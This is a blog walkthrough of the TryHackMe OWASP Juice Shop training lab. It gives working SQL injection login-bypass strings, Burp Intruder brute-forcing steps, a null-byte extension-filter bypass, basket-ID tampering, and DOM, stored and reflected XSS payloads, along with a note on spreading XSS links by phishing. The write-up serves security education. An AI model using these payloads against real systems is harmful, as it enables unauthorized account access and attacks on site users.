TryHackMe: OWASP Juice Shop

goay xuan hui
6 min readMar 3, 2021

SQL Injection

Question #1: Log into the administrator account!

email: ‘ or 1=1-- || password: a

To perform a SQL injection attack, we must first understand the SQL query:

SELECT * FROM users WHERE email = ‘admin’ AND password = ‘12345’;

So, this is how it looks like when we input {email: ‘ or 1=1 --}{password: a}.

SELECT * FROM users WHERE email = ‘ ‘ or 1=1--’ AND password = ‘a’;

Since 1=1 always equal to true and — tells the server that whatever after is just a comment section, this query will return the whole statement as true.

Thus, it tells the server that the email is valid, and log us into user id 0, which happens to be the administrator account.

Question #2: Log into the Bender account!

email: bender@juice-sh.op’-- || password: a

SELECT * FROM users WHERE email = ‘bender@juice-sh.op’ --’ AND password = ‘a’;

References: https://portswigger.net/web-security/sql-injection

Password Attack

Question #1: Bruteforce the Administrator account’s password!

This can be easily done using Burp Suite:

  1. Use Burp to intercept a log in request.
  2. Forward the request to Intruder.
  3. Select the password field.
  4. Load the payload from /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt

Sensitive Data Exposure

Question #1: Access the Confidential Document!

Before getting into the actual hacking part, it’s good to always have a look around before.

  1. Turn on your browser proxy.
  2. Set the Intercept mode on Burp Suite to off.
  3. Browse around the website to build a site map.
  4. Go to “Scope” tab in Burp Suite and you will see a FTP directory there.
  5. Access http://10.10.111.215/ftp/ and download the acquisitions.md file.

Question #2: Find the ScoreBoard!

From the site map that you built from Question #1, you should be able to see the below:

%20 in URL encoding stands for space so to access the scoreboard just paste this in the link: http://10.10.111.215/#/score-board.

Poison Null Byte

Question #3: Download the Backup file!

In computing, “.bak” is a filename extension commonly used to signify a backup copy of a file.

OWASP Juice Shop (Express ^4.17.1)
403 Error: Only .md and .pdf files are allowed
!

In this case, we get an error for downloading the .bak file extension from the FTP directory with 403 error: Only .md and .pdf files are allowed!

To bypass this error, we can use Poison Null Byte technique by adding %00 but since we are downloading using URL, we need to encode %00 into URL encoded format, which is %2500.

http://10.10.86.49/ftp/package.json.bak%2500.md

For example,

String filename = request.getParameter(“filename”);

if (filename.endsWith(“.jpg”))
{
File f = new File(filename);

This function checks for user-supplied file extension to make sure that it is a JPEG file. If so, the argument is passed to the constructor for java.io.file to open the specified file.

However, this can be exploited by passing secret.txt%00.jpg into the function. The exploitation works due to the way null bytes are handled in managed code and native code (java.io.file), which in the latter, null byte will effectively terminate the string.

In this case, when the input was passed to the function…

  1. It checks the last four characters → secret.txt%00.jpg → Match!
  2. Supply the arguments to java.io.file where null byte will terminate the string → So secret.txt will be processed instead.

References: https://portswigger.net/blog/null-byte-attacks-are-alive-and-well

Access Control Vulnerabilities and Privilege Escalation

Question #1: Access the administration page!

http://10.10.86.130/#/administration

There are few ways to find hidden admin page:

  1. Browse to relevant admin page through predictable URLs like:

https://insecure-website.com/admin

https://insecure-website.com/robots.txt

2. For less predictable URLs, browse through the Web Developers menu for index page or JS files as URL might be disclosed in JavaScript that constructs the user interface based on the user’s role.

In this case, we can find out the admin page by opening the debugger on FireFox → Refresh the page → Look for index or .js page → Search for the term “admin” → Look for “path:xxx”.

References: https://portswigger.net/web-security/access-control

Question #2: View another user’s shopping basket!

This can be done by simply browsing to ‘Your Basket’ page using your account and forward the request to Burp.

Make sure that you forward each request till you see: GET /rest/basket/1 HTTP/1.1.

Then, you can simply just change the parameter to GET /rest/basket/2 HTTP/1.1.

XSS Attacks

Question #1: Perform a DOM XSS!

The easiest way to test if a website is vulnerable to DOM XSS is by injecting <iframe>. <iframe> is a common HTML element found in many web applications. If the website allows user to modify the <iframe> or other DOM elements, it is most likely be vulnerable to XSS.

In this case, we can inject <iframe src=”javascript(‘xss’)”> into the search bar and see if it will trigger an alert.

DOM (Document Object Model) is used to generate dynamic content from user input that can be processed without checking.

  • Source: Location that user can input into DOM. For example, “location.search”.
  • Sink: DOM location in which the user input can be executed. For example, “document.write”.

The best-known sources and sinks are listed below:

Sources

  • document.URL
  • document.referrer
  • location
  • location.href
  • location.search
  • location.hash
  • location.pathname

Sinks

  • eval
  • setTimeout
  • setInterval
  • document.write
  • element.innerHTML

Question #2: Perform a persistent XSS!

Persistent XSS is known as Stored XSS. This vulnerability is exploited by injecting malicious script into the server so that each time the infected page is viewed, the malicious script is transmitted into the victim’s browser.

In this case, we can see that OWASP Juice Shop has a “Last Login Page” that keeps track of the user’s last login IP. With this, we can try to exploit Persistent XSS by injecting malicious script into the True-Client-IP header so that when the user requests for the “Last Login IP” page, the script will be activated.

Now, True-Client-IP header is similar to X-Forwarded-For header, which is used to identify the originating IP address of a client who connects through a proxy or load balancer. This is because when traffic is intercepted between the client and the server, the server would only log the IP address of the proxy or the load balancer.

  1. Login to the admin account.
  2. Turn on the browser’s proxy and the interception in Burp.
  3. Log out from the admin account → Go to Burp → Find the logout request.

4. Forward the HTTP request to repeater → Add the header below → Click send.

True-Client-IP: <iframe src=”javascript:alert(`xss`)”>

5. Go back to the browser → Turn the browser’s proxy off → Log in to the “Last Login IP” page → You will see the ‘xss’ alert pop up.

Question #3: Perform a reflected XSS!

Unlike stored XSS attack, reflected XSS needs user to click on the infected link. One way to do this is by distributing malicious link through phishing email or comment section in the website.

This exploitation can be performed by looking at the URL parameter. In this case, if we browse to the ‘Order History’ page and click on the ‘Truck’ icon, it will bring us to the track result page where it has the “id” field.

http://10.10.62.102/#/track-result?id=5267-d4643c9c9c9280cf

From there, we could try to exploit if the input is properly sanitized before passing to the database by replacing the “id” with <iframe src=”javascript:alert(`xss`)”>.

--

--

goay xuan hui

A food lover, a cyber security enthusiast, a musician and a traveller, so you will see a mix of different contents in my blog. ☺️